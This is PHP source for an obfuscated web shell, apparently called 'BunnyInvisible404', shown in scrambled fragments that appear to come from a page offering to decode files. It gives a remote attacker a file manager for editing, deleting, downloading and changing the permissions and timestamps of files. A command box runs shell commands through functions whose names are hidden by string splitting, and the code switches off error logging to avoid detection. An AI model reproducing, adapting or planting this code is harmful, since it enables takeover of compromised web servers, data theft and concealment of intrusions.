                        class="fa-solid fa-rectangle-terminal"></i>&nbsp;<?= 'C' . 'o' . 'mm' . 'an' . 'd' ?></button></a>  
            <a href="?path=<?= $path ?>&tools=newfolder"><button  
                    class="btn-new-folder uk-button uk-button-default uk-margin-large-bottom font-white font-protest-riot"><i  
                        class="fa-sharp fa-solid fa-folder-plus"></i>&nbsp;<?= 'N' . 'ew' . ' F' . 'ol' . 'de' . 'r' ?></button></a>  
        <div class="mass uk-flex uk-flex-center uk-flex-middle uk-flex-column">  
            if (isset($_POST['btn-mass'])) {  
                if (isset($_POST['mass-option']) == 'mass_delete') {  
                    if (!empty($_POST['checkfolder'])) {  
                        foreach ($_POST['checkfolder'] as $folder) {  
                            if (is_dir($folder)) {  
                                if (deleteDir($folder)) {  
                                    echo '  
                                    <div class="uk-alert-success" uk-alert>  
                                        <a href class="uk-alert-close" uk-close></a>  
                                        <p>' . $folder . ' De' . 'le' . 'te' . 'd!&nbsp;<i class="fa-solid fa-trash-check"></i></p>  
                                } else {  
                                    echo '  
                                    <div class="uk-alert-danger" uk-alert>  
                                        <a href class="uk-alert-close" uk-close></a>  
                                        <p>' . $folder . ' C' . 'an' . ' N' . 'ot' . ' D' . 'el' . 'et' . 'e' . 'd!&nbsp;<i class="fa-solid fa-trash-xmark"></i></p>  
                    if (!empty($_POST['checkfile'])) {  
                        foreach ($_POST['checkfile'] as $file) {  
                            if (file_exists($file)) {  
                                if (deleteFile($file)) {  
                                    echo '  
                                    <div class="uk-alert-success" uk-alert>  
                                        <a href class="uk-alert-close" uk-close></a>  
                                        <p>' . $file . ' De' . 'le' . 'te' . 'd!&nbsp;<i class="fa-solid fa-trash-check"></i></p>  
                                } else {  
                                    echo '  
                                    <div class="uk-alert-danger" uk-alert>  
                                        <a href class="uk-alert-close" uk-close></a>  
                                        <p>' . $file . ' Ca' . 'n ' . 'No' . 't D' . 'el' . 'et' . 'ed' . '!&nbsp;<i class="fa-solid fa-trash-xmark"></i></p>  
                } else {  
        if (isset($_GET['deletedir'])) {  
            $dirName = $_GET['deletedir'];  
            if (deleteDir($dirName)) {  
                echo '  
                        <div class="uk-alert-success" uk-alert>  
                            <a href class="uk-alert-close" uk-close></a>  
                            <p>Success, F' . 'ol' . 'de' . 'r D' . 'el' . 'et' . 'e' . 'd!&nbsp;<i class="fa-solid fa-trash-check"></i></p>  
            } else {  
                echo '  
                        <div class="uk-alert-danger" uk-alert>  
                            <a href class="uk-alert-close" uk-close></a>  
                            <p>Failed, F' . 'ol' . 'd' . 'er' . ' C' . 'an' . ' N' . 'o' . 't D' . 'el' . 'et' . 'e' . 'd!&nbsp;<i class="fa-solid fa-trash-xmark"></i></p>  
        if (isset($_GET['deletefile'])) {  
            $fileName = $_GET['deletefile'];  
            if (deleteFile($fileName)) {  
                echo '  
                    <div class="uk-alert-success" uk-alert>  
                        <a href class="uk-alert-close" uk-close></a>  
                        <p>Success, F' . 'i' . 'l' . 'e D' . 'el' . 'et' . 'ed' . '!&nbsp;<i class="fa-solid fa-trash-check"></i></p>  
            } else {  
                echo '  
                <div class="uk-alert-danger" uk-alert>  
                    <a href class="uk-alert-close" uk-close></a>  
                    <p>Failed, F' . 'il' . 'e C' . 'a' . 'n No' . 't D' . 'e' . 'le' . 'te' . 'd!&nbsp;<i class="fa-solid fa-trash-xmark"></i></p>  
        $toolsparam = isset($_GET['tools']) ? $_GET['tools'] : null;  
        if ($toolsparam === null) {  
        } elseif ($toolsparam === 'newfiles') {  
            if (isset($_POST['btn-newfiles'])) {  
                $fi_le_name = htmlspecialchars($_POST['newfilesname']);  
                $fi_le_content = $_POST['newfilecontent'];  
                $f_il_e_success = '  
                    <div class="uk-alert-success" uk-alert>  
                        <a href class="uk-alert-close" uk-close></a>  
                        <p>' . $fi_le_name . '&nbsp;Fi' . 'le Created&nbsp;<i class="fa-solid fa-file-check font-green"></i></p>  
                $f_il_e_failed = '  
                    <div class="uk-alert-danger" uk-alert>  
                        <a href class="uk-alert-close" uk-close></a>  
                        <p>Create Fi' . 'le Failed&nbsp;<i class="fa-solid fa-file-xmark font-red"></i></p>  
                if ($fi_le_name == '' && $fi_le_content == '') {  
                    echo '  
                        <div class="uk-alert-warning" uk-alert>  
                            <a href class="uk-alert-close" uk-close></a>  
                            <p>Sorry. Cant Not Cr' . 'e' . 'a' . 't' . 'e Fi' . 'l' . 'es. Your Input Is Empty&nbsp;<i class="fa-regular fa-location-exclamation font-yellow"></i></p>  
                } else {  
                    if ($func_exist($fo)) {  
                        $c_r_e_a_t_e_f_i_l_e_1 = $fo($fi_le_name, 'w');  
                        if ($c_r_e_a_t_e_f_i_l_e_1 === false) {  
                            $c_r_e_a_t_e_f_i_l_e_2 = $f_put($fi_le_name, $fi_le_content);  
                            if ($c_r_e_a_t_e_f_i_l_e_2 === false) {  
                                echo $f_il_e_failed;  
                            } else {  
                                echo $f_il_e_success;  
                        } else {  
                            if ($fw($c_r_e_a_t_e_f_i_l_e_1, $fi_le_content) === false) {  
                                echo $f_il_e_failed;  
                            } else {  
                                echo $f_il_e_success;  
                    } elseif ($func_exist($f_put)) {  
                        $c_r_e_a_t_e_f_i_l_e_2 = $f_put($fi_le_name, $fi_le_content);  
                        if ($c_r_e_a_t_e_f_i_l_e_2 === false) {  
                            echo $f_il_e_failed;  
                        } else {  
                            echo $f_il_e_success;  
                    } else {  
                        echo '  
                            <div class="uk-alert-warning" uk-alert>  
                                <a href class="uk-alert-close" uk-close></a>  
                                <p>Sorry. Cant Not Cr' . 'ea' . 't' . 'e Fi' . 'le' . 's&nbsp;<i class="fa-regular fa-location-exclamation font-yellow"></i></p>  
            echo '  
                <div class="uk-divider uk-divider-small"></div>  
                <form action="" method="POST" class="uk-width-1-2">  
                    <fieldset class="uk-fieldset">  
                        <div class="uk-margin uk-float-right">  
                            <button type="submit" name="btn-new' . 'fi' . 'le' . 's" class="uk-button uk-button-primary uk-text-bold uk-border-rounded">Cr' . 'ea' . 'te F' . 'il' . 'e</button>  
                        <legend class="uk-legend font-bold font-protest-riot">N' . 'e' . 'w ' . 'F' . 'il' . 'es</legend>  
                        <div class="uk-margin">  
                            <input class="uk-input font-poppins" name="newfi' . 'l' . 'es' . 'na' . 'me" type="text" placeholder="fi' . 'le' . 'na' . 'me.' . 't' . 'x' . 't" aria-label="Input">  
                        <div class="uk-margin">  
                            <textarea class="uk-textarea font-ubuntu-mono" name="newfilecontent" rows="15" placeholder="Bunny Invisible Code Here!" aria-label="Textarea"></textarea>  
        } elseif ($toolsparam === 'newfolder') {  
            if (isset($_POST['btn-newfolder'])) {  
                $f_ol_de_r_name = htmlspecialchars($_POST['newfoldername']);  
                $f_ol_de_r_success = '  
                    <div class="uk-alert-success" uk-alert>  
                        <a href class="uk-alert-close" uk-close></a>  
                        <p><font class="font-yellow">' . $f_ol_de_r_name . '</font>&nbsp;Fo' . 'ld' . 'er Cr' . 'ea' . 'te' . 'd&nbsp;<i class="fa-solid fa-folder-check font-green"></i></p>  
                $f_ol_de_r_failed = '  
                    <div class="uk-alert-danger" uk-alert>  
                        <a href class="uk-alert-close" uk-close></a>  
                        <p>Cr' . 'ea' . 't' . 'e F' . 'ol' . 'de' . 'r Failed&nbsp;<i class="fa-solid fa-folder-xmark font-red"></i></p>  
                if ($f_ol_de_r_name == '') {  
                    echo '  
                        <div class="uk-alert-warning" uk-alert>  
                            <a href class="uk-alert-close" uk-close></a>  
                            <p>Sorry. Cant Not Cr' . 'e' . 'at' . 'e Fo' . 'ld' . 'er. This Input Is Empty&nbsp;<i class="fa-regular fa-location-exclamation font-yellow"></i></p>  
                } else {  
                    if (!$is_d($f_ol_de_r_name)) {  
                        if ($cr_ea_teF_old_er($f_ol_de_r_name)) {  
                            echo $f_ol_de_r_success;  
                        } else {  
                            echo $f_ol_de_r_failed;  
                    } else {  
                        echo '  
                            <div class="uk-alert-warning" uk-alert>  
                                <a href class="uk-alert-close" uk-close></a>  
                                <p>Sorry. Cant Not C' . 're' . 'at' . 'e F' . 'ol' . 'de' . 'r. This ' . $fo_lde_rna_me . ' Allready Exists&nbsp;<i class="fa-regular fa-location-exclamation font-yellow"></i></p>  
            echo '  
                <div class="uk-divider uk-divider-small"></div>  
                <form action="" method="POST" class="uk-width-1-2">  
                    <fieldset class="uk-fieldset">  
                        <div class="uk-margin uk-float-right">  
                            <button type="submit" name="btn-newfolder" class="uk-button uk-button-primary uk-text-bold uk-border-rounded">Cr' . 'ea' . 'te' . ' F' . 'ol' . 'de' . 'r</button>  
                        <legend class="uk-legend font-bold font-protest-riot">N' . 'e' . 'w ' . 'F' . 'ol' . 'de' . 'r</legend>  
                        <div class="uk-margin">  
                            <input class="uk-input font-poppins" name="newfoldername" type="text" placeholder="N' . 'e' . 'w F' . 'ol' . 'd' . 'er" aria-label="Input">  
        } elseif ($toolsparam === 'cmd') {  
            echo '  
                <form action="" method="POST" class="uk-width-1-2">  
                    <fieldset class="uk-fieldset">  
                        <legend class="uk-legend font-bold font-protest-riot"><i class="fa-solid fa-rectangle-terminal"></i>&nbsp;&nbsp;C' . 'o' . 'mm' . 'an' . 'd</legend>  
                        <div class="uk-margin-small uk-flex uk-flex-row uk-flex-center uk-flex-middle uk-flex-nowrap">  
                            <label for="komendnya" class="uk-margin-small-right uk-text-large">$</label>  
                            <input style="background: var(--gray-950);" class="uk-input font-poppins uk-margin-small-right" id="komendnya" name="komendnya" type="text" aria-label="Input" autofocus>  
                            <button type="submit" name="btn-cmd" style="background: var(--gray-950); border: 1px solid var(--gray-700);" class="uk-button uk-button-secondary uk-text-bold uk-border-rounded">ENTER</button>  
            if (isset($_POST['btn-cmd'])) {  
                echo '<textarea style="background: var(--gray-950); border: 1px solid var(--gray-500); color: var(--green-500);" class="output-cmd uk-textarea font-ubuntu-mono" name="newfilecontent" rows="15" aria-label="Textarea" readonly>' . BunnyCmd($_POST["komendnya"]) . '</textarea>';  
            echo '</div>  
        } else {  
        if (isset($_GET['editfile'])) {  
            $this_file = $_GET['editfile'];  
            if (isset($_POST['btn-editfiles'])) {  
                $newfilecontent = $_POST['newfilecontent'];  
                $f_il_e_success = '  
                        <div class="uk-alert-success" uk-alert>  
                            <a href class="uk-alert-close" uk-close></a>  
                            <p>Success, Fi' . 'le Saved&nbsp;<i class="fa-solid fa-file-check font-green"></i></p>  
                $f_il_e_failed = '  
                    <div class="uk-alert-danger" uk-alert>  
                        <a href class="uk-alert-close" uk-close></a>  
                        <p>Failed, Fi' . 'le Not Saved&nbsp;<i class="fa-solid fa-file-xmark font-red"></i></p>  
                if ($func_exist($fo)) {  
                    $editfi_le1 = $fo($this_file, 'w');  
                    if ($fw($editfi_le1, $newfilecontent)) {  
                        echo $f_il_e_success;  
                    } else {  
                        echo $f_il_e_failed;  
                } elseif ($func_exist($f_put)) {  
                    $editfi_le2 = $f_put($this_file, $newfilecontent);  
                    if ($editfi_le2 === false) {  
                        echo $f_il_e_failed;  
                    } else {  
                        echo $f_il_e_success;  
                } else {  
                    echo '  
                        <div class="uk-alert-warning" uk-alert>  
                            <a href class="uk-alert-close" uk-close></a>  
                            <p>Sorry. Cant Edit This Fi' . 'le ' . $this_file . '&nbsp;<i class="fa-solid fa-file-exclamation"></i></p>  
            echo '  
                <div class="uk-divider uk-divider-small"></div>  
                <form action="" method="POST" class="uk-width-1-2">  
                    <fieldset class="uk-fieldset">  
                        <div class="uk-margin uk-float-right">  
                            <button type="submit" name="btn-editfiles" class="uk-button uk-button-primary uk-text-bold uk-border-rounded">Save</button>  
                        <legend class="uk-legend font-bold font-protest-riot">Edit Files</legend>  
                        <p class="font-teal">' . $path . '/' . $this_file . '</p>  
                        <div class="uk-margin">  
                            <textarea style="background: var(--gray-950); color: var(--emerald-500);" class="uk-textarea font-ubuntu-mono" name="newfilecontent" rows="15" aria-label="Textarea">' . $hayoloh(BunnyReadFile($this_file)) . '</textarea>  
        if (isset($_GET['rename'])) {  
            $hayoloh = 'h' . 'tm' . 'lspe' . 'cialc' . 'hars';  
            $this_name = $_GET['rename'];  
            $rnm = 'r' . 'e' . 'n' . 'a' . 'm' . 'e';  
            if (isset($_POST['btn-rename'])) {  
                $newname = $hayoloh($_POST['newname']);  
                if ($rnm($this_name, $path . '/' . $newname)) {  
                    echo '  
                        <div class="uk-alert-success" uk-alert>  
                            <a href class="uk-alert-close" uk-close></a>  
                                <font class="font-green">Rename Success&nbsp;<i class="fa-sharp fa-regular fa-shield-check font-green"></i>  
                                <font class="font-white">' . $this_name . ' To ' . $newname . '</font>  
                } else {  
                    echo '  
                        <div class="uk-alert-danger" uk-alert>  
                            <a href class="uk-alert-close" uk-close></a>  
                            <p>Rename Failed&nbsp;<i class="fa-regular fa-octagon-xmark font-red"></i></p>  
                $this_name = $newname;  
            echo '  
                <div class="uk-divider uk-divider-small"></div>  
                <form action="" method="POST" class="uk-width-1-2">  
                    <fieldset class="uk-fieldset">  
                        <div class="uk-margin uk-float-right">  
                            <button type="submit" name="btn-rename" class="uk-button uk-button-primary uk-text-bold uk-border-rounded">Rename</button>  
                        <p class="font-teal">' . $path . '/' . $this_name . '</p>  
                        <legend class="uk-legend font-bold font-protest-riot">Rename</legend>  
                        <div class="uk-margin">  
                            <input class="uk-input font-poppins" name="newname" type="text" value="' . $this_name . '" aria-label="Input">  
        if (isset($_GET['permission'])) {  
            $hayoloh = 'h' . 'tm' . 'lspe' . 'cialc' . 'hars';  
            $value = $path . '/' . $_GET['permission'];  
            if (isset($_POST['btn-permission'])) {  
                $newperms = $hayoloh($_POST['newperms']);  
                $chperms = 'c' . 'h' . 'm' . 'o' . 'd';  
                $oct = 'o' . 'c' . 't' . 'd' . 'e' . 'c';  
                if ($chperms($value, $oct($newperms))) {  
                    echo '  
                        <div class="uk-alert-success" uk-alert>  
                            <a href class="uk-alert-close" uk-close></a>  
                            <p><font class="font-green">Change Permission Success&nbsp;<i class="fa-sharp fa-regular fa-shield-check font-green"></i></p>  
                } else {  
                    echo '  
                        <div class="uk-alert-danger" uk-alert>  
                            <a href class="uk-alert-close" uk-close></a>  
                            <p>Change Permission Failed&nbsp;<i class="fa-regular fa-octagon-xmark font-red"></i></p>  
            echo '  
                <div class="uk-divider uk-divider-small"></div>  
                <form action="" method="POST" class="uk-width-1-2">  
                    <fieldset class="uk-fieldset">  
                        <div class="uk-margin uk-float-right">  
                            <button type="submit" name="btn-permission" class="uk-button uk-button-primary uk-text-bold uk-border-rounded">Change Permission</button>  
                        <p class="font-teal">' . $value . '</p>  
                        <legend class="uk-legend font-bold font-protest-riot">Cange Permission</legend>  
                        <div class="uk-margin">  
                            <input class="uk-input font-poppins" name="newperms" type="text" value="' . chPerms($value) . '" aria-label="Input">  
        if (isset($_GET['changedate'])) {  
            $hayoloh = 'h' . 'tm' . 'lspe' . 'cialc' . 'hars';  
            $f_time = 'f' . 'il' . 'e' . 'm' . 't' . 'im' . 'e';  
            $str_time = 's' . 'tr' . 'to' . 'ti' . 'me';  
            $tch = 'to' . 'uc' . 'h';  
            $value = $_GET['changedate'];  
            $this_date = date("Y-m-d H:i:s", $f_time($value));  
            if (isset($_POST['btn-newdate'])) {  
                $newDate = $hayoloh($_POST['newdate']);  
                if ($str_time($newDate) !== false) {  
                    if ($tch($value, $str_time($newDate))) {  
                        echo '  
                            <div class="uk-alert-success" uk-alert>  
                                <a href class="uk-alert-close" uk-close></a>  
                                <p><font class="font-green">Change Date Success&nbsp;<i class="fa-solid fa-calendar-check"></i></p>  
                    } else {  
                        echo '  
                            <div class="uk-alert-danger" uk-alert>  
                                <a href class="uk-alert-close" uk-close></a>  
                                <p>Change Date Failed&nbsp;<i class="fa-solid fa-calendar-xmark"></i></p>  
                } else {  
                    echo '  
                        <div class="uk-alert-warning" uk-alert>  
                            <a href class="uk-alert-close" uk-close></a>  
                            <p>Change Date Failed, Invalid Date Format&nbsp;<i class="fa-solid fa-calendar-exclamation"></i></p>  
            echo '  
                <div class="uk-divider uk-divider-small"></div>  
                <form action="" method="POST" class="uk-width-1-2">  
                    <fieldset class="uk-fieldset">  
                        <div class="uk-margin uk-float-right">  
                            <button type="submit" name="btn-newdate" class="uk-button uk-button-primary uk-text-bold uk-border-rounded">Change Date</button>  
                        <p class="font-teal">' . $path . '/' . $value . '</p>  
                        <legend class="uk-legend font-bold font-protest-riot">Cange Date</legend>  
                        <div class="uk-margin">  
                            <input class="uk-input font-poppins" name="newdate" type="text" value="' . $this_date . '" aria-label="Input">  
    <div class="main uk-width-1-1 uk-margin-top uk-margin-small-left uk-margin-small-right"  
        style="background: var(--gray-900);">  
        $scn_d = 'sc' . 'an' . 'd' . 'ir';  
        $scan = $scn_d($path);  
        <div class="uk-overflow-auto uk-flex uk-flex-center uk-flex-middle uk-flex-row uk-flex-wrap">  
            <form action="" method="POST" enctype="multipart/form-data" class="uk-width-1-1">  
                <table class="bunny-table uk-width-1-1">  
                            <th>Select All<br><input type="checkbox" id="checkall" class="checkall" name="checkall"  
                            <th>Last Modified</th>  
                            <td><?= '-' . 'B' . 'I' . 'C' . '-' ?></td>  
                            <td class="body-folder uk-text-nowrap"><a href="?path=<?= dirname($path) ?>"  
                                    class="dirpath font-white"><i  
                                        class="fa-duotone fa-folders font-amber"></i>&nbsp;&nbsp;..</a></td>  
                            <td><?= '-' . 'B' . 'U' . 'N' . 'N' . 'Y' . '-' ?></td>  
                            <td><?= '-' . 'B' . 'U' . 'N' . 'N' . 'Y' . '-' ?></td>  
                            <td><?= '-' . 'B' . 'U' . 'N' . 'N' . 'Y' . '-' ?></td>  
                            <td><?= '-' . 'B' . 'U' . 'N' . 'N' . 'Y' . '-' ?></td>  
                            <td><?= '-' . 'B' . 'U' . 'N' . 'N' . 'Y' . '-' ?></td>  
                        foreach ($scan as $dir) {  
                            if (!is_dir("$path/$dir") || $dir == '.' || $dir == '..')  
                            if ($func_exist($psx_usr_uid)) {  
                                $d_owner = @$psx_usr_uid($own_f("$path/$dir"));  
                                $d_owner = $d_owner['name'];  
                            } else {  
                                $d_owner = $own_f("$path/$dir");  
                            if ($func_exist($psx_grp_gid)) {  
                                $d_group = @$psx_grp_gid($grp_f("$path/$dir"));  
                                $d_group = $d_group['name'];  
                            } else {  
                                $d_group = $grp_f("$path/$dir");  
                            echo '<tr class="tr-body">';  
                            echo '<td><input type="checkbox" class="checkfilefolder" name="checkfolder[]" value="' . $dir . '" aria-label="Checkbox"></td>';  
                            echo '<td class="body-folder uk-text-nowrap"><a href="?path=' . $path . '/' . $dir . '" class="dirpath font-white"><i class="fa-duotone fa-folders font-amber"></i>&nbsp;&nbsp;' . $dir . '</a></td>';  
                            echo '<td class="uk-text-nowrap"><a href="?path=' . $path . '&changedate=' . $dir . '" class="body-datetime">' . date('Y-m-d H:i:s', filemtime($path . '/' . $dir)) . '</a></td>';  
                            echo '<td class="body-size uk-text-nowrap">--DIR--</td>';  
                            echo '<td class="uk-text-nowrap">';  
                            if ($d_owner == 'root' || $d_owner == 0) {  
                                echo '<font class="font-white">' . $d_owner . '</font>';  
                            } else {  
                                echo '<font class="font-sky">' . $d_owner . '</font>';  
                            echo '/';  
                            if ($d_group == 'root' || $d_group == 0) {  
                                echo '<font class="font-white">' . $d_group . '</font>';  
                            } else {  
                                echo '<font class="font-sky">' . $d_group . '</font>';  
                            echo '</td>';  
                            echo '<td class="uk-text-nowrap"><a href="?path=' . $path . '&permission=' . $dir . '" class="body-permission">';  
                            if ($is_w("$path/$dir"))  
                                echo '<font class="font-green green-perms">';  
                            elseif (!$is_r("$path/$dir"))  
                                echo '<font class="font-red red-perms">';  
                            echo perms("$path/$dir");  
                            if ($is_w("$path/$dir") || !$is_r("$path/$dir"))  
                                echo '</font></a></td>';  
                            echo '<td class="uk-text-nowrap">';  
                            echo '<a href="?path=' . $path . '&rename=' . $dir . '" uk-tooltip="Rename"><i class="icon fa-sharp fa-solid fa-pen-field rename-folder-icon"></i></a>';  
                            echo '<a href="?path=' . $path . '&permission=' . $dir . '" class="uk-margin-small-left uk-margin-small-right" uk-tooltip="Permission"><i class="icon fa-duotone fa-user-pen user-icon"></i></a>';  
                            echo '<a href="?path=' . $path . '&deletedir=' . $dir . '" uk-tooltip="Permission"><i class="icon fa-solid fa-trash-can-slash delete-icon"></i></a>';  
                            echo '</td>';  
                            echo '</tr>';  
                        foreach ($scan as $file) {  
                            $f_size = 'f' . 'il' . 'es' . 'iz' . 'e';  
                            if (!$is_f("$path/$file"))  
                            $size = $f_size("$path/$file") / 1024;  
                            $size = $rnd($size, 3);  
                            if ($size >= 1024) {  
                                $size = $rnd($size / 1024, 2) . ' MB';  
                            } else {  
                                $size = $size . ' KB';  
                            if ($func_exist($psx_usr_uid)) {  
                                $f_owner = @$psx_usr_uid($own_f("$path/$file"));  
                                $f_owner = $f_owner['name'];  
                            } else {  
                                $f_owner = $own_f("$path/$file");  
                            if ($func_exist($psx_grp_gid)) {  
                                $f_group = @$psx_grp_gid($grp_f("$path/$file"));  
                                $f_group = $f_group['name'];  
                            } else {  
                                $f_group = $grp_f("$path/$file");  
                            echo '<tr class="tr-body">';  
                            echo '<td><input type="checkbox" class="checkfilefolder" name="checkfile[]" value="' . $file . '" aria-label="Checkbox"></td>';  
                            echo '<td class="body-file uk-text-nowrap"><a href="?path=' . $path . '&editfile=' . $file . '" class="filepath font-white"><i class="fa-solid fa-files font-white"></i>&nbsp;&nbsp;' . $file . '</a></td>';  
                            echo '<td class="uk-text-nowrap"><a href="?path=' . $path . '&changedate=' . $file . '" class="body-datetime">' . date('Y-m-d H:i:s', filemtime($path . '/' . $file)) . '</a></td>';  
                            echo '<td class="body-size uk-text-nowrap">' . $size . '</td>';  
                            echo '<td class="uk-text-nowrap">';  
                            if ($f_owner == 'root' || $f_owner == 0) {  
                                echo '<font class="font-white">' . $f_owner . '</font>';  
                            } else {  
                                echo '<font class="font-sky">' . $f_owner . '</font>';  
                            echo '/';  
                            if ($f_group == 'root' || $f_group == 0) {  
                                echo '<font class="font-white">' . $f_group . '</font>';  
                            } else {  
                                echo '<font class="font-sky">' . $f_group . '</font>';  
                            echo '</td>';  
                            echo '<td class="uk-text-nowrap"><a href="?path=' . $path . '&permission=' . $file . '" class="body-permission">';  
                            if ($is_w("$path/$file"))  
                                echo '<font class="font-green green-perms">';  
                            elseif (!$is_r("$path/$file"))  
                                echo '<font class="font-red red-perms">';  
                            echo perms("$path/$file");  
                            if ($is_w("$path/$file") || !$is_r("$path/$file"))  
                                echo '</font></a></td>';  
                            echo '<td class="uk-text-nowrap">';  
                            echo '<a href="?path=' . $path . '&rename=' . $file . '" uk-tooltip="Rename"><i class="icon fa-sharp fa-solid fa-pen-field rename-file-icon"></i></a>';  
                            echo '<a href="?path=' . $path . '&editfile=' . $file . '" class="uk-margin-small-left" uk-tooltip="Rename"><i class="icon fa-regular fa-file-pen edit-file-icon"></i></a>';  
                            echo '<a href="?path=' . $path . '&permission=' . $file . '" class="uk-margin-small-left uk-margin-small-right" uk-tooltip="Permission"><i class="icon fa-duotone fa-user-pen user-icon"></i></a>';  
                            echo '<a href="?path=' . $path . '&downloadfile=' . $file . '" class="uk-margin-small-right" uk-tooltip="Permission"><i class="icon fa-solid fa-folder-arrow-down download-icon"></i></a>';  
                            echo '<a href="?path=' . $path . '&deletefile=' . $file . '" uk-tooltip="Permission"><i class="icon fa-solid fa-trash-can-slash delete-icon"></i></a>';  
                            echo '</td>';  
                            echo '</tr>';  
                <div class="uk-margin">  
                        var selectAllCheckbox = document.getElementById('checkall');  
                        var checkFileFolder = document.querySelectorAll('.checkfilefolder');  
                        selectAllCheckbox.addEventListener('change', function() {  
                            for (var i = 0; i < checkFileFolder.length; i++) {  
                                checkFileFolder[i].checked = selectAllCheckbox.checked;  
                        for (var i = 0; i < checkFileFolder.length; i++) {  
                            checkFileFolder[i].addEventListener('change', function() {  
                                var allChecked = true;  
                                for (var j = 0; j < checkFileFolder.length; j++) {  
                                    if (!checkFileFolder[j].checked) {  
                                        allChecked = false;  
                                selectAllCheckbox.checked = allChecked;  
                    <select class="mass-option font-white uk-select uk-width-1-6" aria-label="Custom controls"  
                        <option name="mass-delete" value="mass_delete">Delete</option>  
                    <button type="submit" name="btn-mass" class="btn-mass font-white">&gt;&gt;</button>  
    <div class="footer uk-margin-large-top uk-width-1-1 uk-flex uk-flex-center uk-flex-middle uk-flex-nowrap"  
        style="background: var(--gray-950);">  
        <!-- Hadehh lammer kang recode, tinggal pake doang malah di recode -->  
        <div class="footer-content uk-padding-small">  
            <span class="font-protest-riot">  
                <font class="font-poppins">&copy;2020 - <?= date("Y"); ?></font> | <a class="font-rose"  
    <script src="<?= $uikit_js ?>"></script>  
    <script src="<?= $uikit_icon ?>"></script>  

Did this file decode correctly?

Original Code

 * Enjoy! -BunnyInvisible404 
@ini_set('error_log', null); 
@ini_set('log_errors', 0); 
@ini_set('max_execution_time', 0); 
@ini_set('output_buffering', 0); 
@ini_set('display_errors', 0); 
//string concat manipulation 
$hayoloh = 'h' . 'tm' . 'lspe' . 'cialc' . 'hars'; 
$func_exist = 'fu' . 'nct' . 'ion' . '_' . 'ex' . 'ist' . 's'; 
$f_exist = "fil" . "e_exi" . "sts"; 
$f_size = "fi" . "les" . "ize"; 
$r_file = "re" . "ad" . "fi" . "le"; 
$rnd = 'ro' . 'un' . 'd'; 
$f_time = 'fi' . 'l' . 'em' . 'ti' . 'm' . 'e'; 
$b_name = "ba" . "sena" . "me"; 
$glb = 'g' . 'l' . 'o' . 'b'; 
$is_d = 'is' . '_' . 'd' . 'i' . 'r'; 
$is_f = 'is' . '_' . 'f' . 'i' . 'l' . 'e'; 
$unl = 'u' . 'n' . 'l' . 'i' . 'n' . 'k'; 
$rm_d = 'r' . 'm' . 'd' . 'i' . 'r'; 
$cr_ea_teF_old_er = "mk" . "d" . "ir"; 
$fo = 'fo' . 'p' . 'e' . 'n'; 
$fw = 'f' . 'wr' . 'it' . 'e'; 
$fc = 'f' . 'cl' . 'os' . 'e'; 
$fr = 'f' . 're' . 'a' . 'd'; 
$f_get = 'f' . 'il' . 'e' . '_' . 'g' . 'e' . 't' . '_' . 'co' . 'nten' . 't' . 's'; 
$f_put = 'f' . 'il' . 'e' . '_' . 'pu' . 't' . '_' . 'co' . 'n' . 'te' . 'nt' . 's'; 
$is_rsrc = 'is' . '_' . 're' . 'so' . 'ur' . 'ce'; 
$sgc = 's' . 'trea' . 'm_g' . 'et_c' . 'ont' . 'ents'; 
$proc = 'pr' . 'oc' . '_' . 'o' . 'pen'; 
$proc_cls = 'p' . 'ro' . 'c' . '_' . 'c' . 'lose'; 
$pop = 'p' . 'ope' . 'n'; 
$pop_cls = 'pc' . 'lose'; 
$exc = 'e' . 'x' . 'ec'; 
$sys = 's' . 'ys' . 't' . 'em'; 
$pass = 'pa' . 's' . 'sth' . 'ru'; 
$sh_exc = 's' . 'he' . 'll' . '_' . 'e' . 'xe' . 'c'; 
$com = 'C' . 'O' . 'M'; 
$wscsh = 'WS' . 'cr' . 'ipt' . '.' . 'S' . 'he' . 'll'; 
$cMdexe = 'c' . 'md' . '.' . 'e' . 'x' . 'e'; 
$preg = 'pr' . 'eg_' . 'mat' . 'ch'; 
$regex = '2' . '>' . '&' . '1'; 
$gflate = 'g' . 'zi' . 'nf' . 'l' . 'at' . 'e'; 
$b64 = 'b' . 'ase' . '6' . '4' . '_' . 'de' . 'co' . 'de'; 
$nelrts = 's' . 'tr' . 'l' . 'en'; 
$rhc = 'c' . 'h' . 'r'; 
$dro = 'o' . 'r' . 'd'; 
$f_perm = 'f' . 'il' . 'ep' . 'e' . 'r' . 'ms'; 
$u_n_a_me = "p" . "hp" . "_" . "un" . "ame"; 
$cw = "ge" . "tc" . "wd"; 
$d_name = 'd' . 'ir' . 'na' . 'm' . 'e'; 
$psx_euid = 'p' . 'os' . 'ix' . '_' . 'ge' . 'te' . 'u' . 'i' . 'd'; 
$psx_egid = 'p' . 'os' . 'ix' . '_' . 'ge' . 'te' . 'g' . 'i' . 'd'; 
$psx_usr_uid = 'p' . 'os' . 'ix' . '_' . 'g' . 'et' . 'pw' . 'u' . 'i' . 'd'; 
$psx_grp_gid = 'p' . 'os' . 'ix' . '_' . 'ge' . 'tg' . 'rg' . 'i' . 'd'; 
$myuid = 'g' . 'et' . 'my' . 'ui' . 'd'; 
$mygid = 'g' . 'et' . 'my' . 'gi' . 'd'; 
$cur_usr = 'g' . 'et' . '_' . 'cu' . 'rr' . 'en' . 't' . '_' . 'us' . 'er'; 
$own_f = 'fi' . 'le' . 'ow' . 'n' . 'er'; 
$grp_f = 'fi' . 'le' . 'gr' . 'ou' . 'p'; 
$g_host_name = 'g' . 'et' . 'ho' . 'st' . 'b' . 'yn' . 'am' . 'e'; 
$is_w = 'is' . '_' . 'wr' . 'it' . 'ab' . 'le'; 
$is_r = 'is' . '_' . 're' . 'ad' . 'ab' . 'le'; 
if (isset($_GET['downloadfile'])) { 
    $get_file = $_GET['downloadfile']; 
    global $f_exist; 
    global $f_size; 
    global $r_file; 
    global $b_name; 
    if ($f_exist($get_file)) { 
        header('Content-Description: File Transfer'); 
        header('Content-Type: application/octet-stream'); 
        header("Cache-Control: no-cache, must-revalidate"); 
        header('Content-Transfer-Encoding: binary'); 
        header("Expires: 0"); 
        header("Cache-Control: no-cache, must-revalidate, max-age=60"); 
        header('Content-Disposition: attachment; filename="' . $b_name($get_file) . '"'); 
        header('Content-Length: ' . filesize($get_file)); 
        header('Pragma: public'); 
    } else { 
        echo '<s' . 'cr' . 'ip' . 't' . '>a' . 'le' . 'rt' . '(' . '"' . 'Fa' . 'il' . 'ed ' . 'To' . ' D' . 'ow' . 'nl' . 'oa' . 'd ' . 'Thi' . 's F' . 'il' . 'e :(
